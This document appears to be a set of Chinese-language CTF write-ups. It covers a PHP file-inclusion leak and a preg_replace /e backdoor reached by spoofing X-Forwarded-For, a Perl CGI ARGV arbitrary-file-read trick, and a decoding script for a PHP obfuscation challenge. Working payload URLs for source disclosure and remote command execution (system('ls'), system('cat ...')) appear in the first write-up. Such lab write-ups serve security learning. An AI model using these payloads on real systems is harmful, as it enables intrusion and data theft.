其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统
题目描述中有后门,于是想到可能会读取源码,试了试文件泄露,无果。
查看源代码发现了?page=index.php
于是想到了文件包含,试了试果然有。
index.php?page=php://filter/read=convert.base64-encode/resource=index.php
index.php源码:
<?php
error_reporting(0);
@session_start();
posix_setuid(1000);
?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>设备维护中心</title>
<meta charset="utf-8">
</head>
<body>
<ul class="layui-nav">
<li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
<legend>设备列表</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
<!-- 这里的 checked 的状态只是演示 -->
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
var table = layui.table,
form = layui.form;
table.render({
elem: '#test',
url: '/somrthing.json',
cellMinWidth: 80,
cols: [
[
{ type: 'numbers' },
{ type: 'checkbox' },
{ field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
{ field: 'name', title: '设备名', templet: '#nameTpl' },
{ field: 'area', title: '区域' },
{ field: 'status', title: '维护状态', minWidth: 120, sort: true },
{ field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
]
],
page: true
});
});
</script>
<script>
layui.use('element', function() {
var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
//监听导航点击
element.on('nav(demo)', function(elem) {
//console.log(elem)
layer.msg(elem.text());
});
});
</script>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
</body>
</html>
发现后门
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
//利用就是replace的pattern后面如果有/e的话,replacement的语句是会得到执行的
//参考链接:https://www.cnblogs.com/dhsx/p/4991983.html
后面操作就很常规:
- 改xff头为127.0.0.1
- 列目录 /index.php?pat=/test/e&rep=system('ls')&sub=test
- 然后发现一个s3chahahaDir/flag/flag.php
- 打开php文件 pat=/test/e&rep=system('cat%20s3chahahaDir/flag/flag.php')&sub=test 查看源码有flag
- 或者这样 show_source('s3chahahaDir/flag/flag.php')
i-got-id-200
csaw-ctf-2016-quals
进入网站有两个功能点,主要看文件上传那个功能点。
我们上传文件会被打印出来,想了很久没想通,看了大佬博客
大佬猜出了大概代码
use strict;
use warnings;
use CGI;
my $cgi= CGI->new;
if ( $cgi->upload( 'file' ) )
{
my $file= $cgi->param( 'file' );
while ( <$file> ) { print "$_"; } }
大概思路,自己也不是太懂2333.
param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。
读文件时,如果我们传入一个ARGV的文件,那么Perl会将传入的参数作为文件名读出来。
利用方法:在正常的上传文件前面加上一个文件上传项ARGV,然后在URL中传入文件路径参数,这样就可以读取任意文件了。
解密
加密脚本
<?php
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";
function encode($str){
$_o=strrev($str);
// echo $_o;
for($_0=0;$_0<strlen($_o);$_0++){
$_c=substr($_o,$_0,1);
$__=ord($_c)+1;
$_c=chr($__);
$_=$_.$_c;
}
return str_rot13(strrev(base64_encode($_)));
}
highlight_file(__FILE__);
/*
逆向加密算法,解密$miwen就是flag
*/
?>
解密脚本
import base64
import string
#rot13解密
upperdict = {}
lowerdict = {}
upperletters = string.ascii_uppercase
lowerletters = string.ascii_lowercase
dststr = []
oristr = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"
for i in range(0, len(lowerletters)):
if i < 13:
lowerdict[lowerletters[i]] = lowerletters[i + 13]
else:
lowerdict[lowerletters[i]] = lowerletters[i - 13]
for i in range(0, len(upperletters)):
if i < 13:
lowerdict[upperletters[i]] = upperletters[i + 13]
else:
lowerdict[upperletters[i]] = upperletters[i - 13]
for ch in oristr:
if ch in lowerdict:
dststr.append(lowerdict[ch])
elif ch in upperdict:
dststr.append(upperdict[ch])
else:
dststr.append(ch)
dststr = ''.join(dststr)
dststr=dststr[::-1]#翻转
dststr=base64.b64decode(dststr.encode('utf-8'))#base64解密
mingwen="" #逆写加密过程
for i in range(len(dststr)):
d=dststr[i:i+1]
c=ord(d)-1
mingwen=mingwen+chr(c)
print(mingwen[::-1])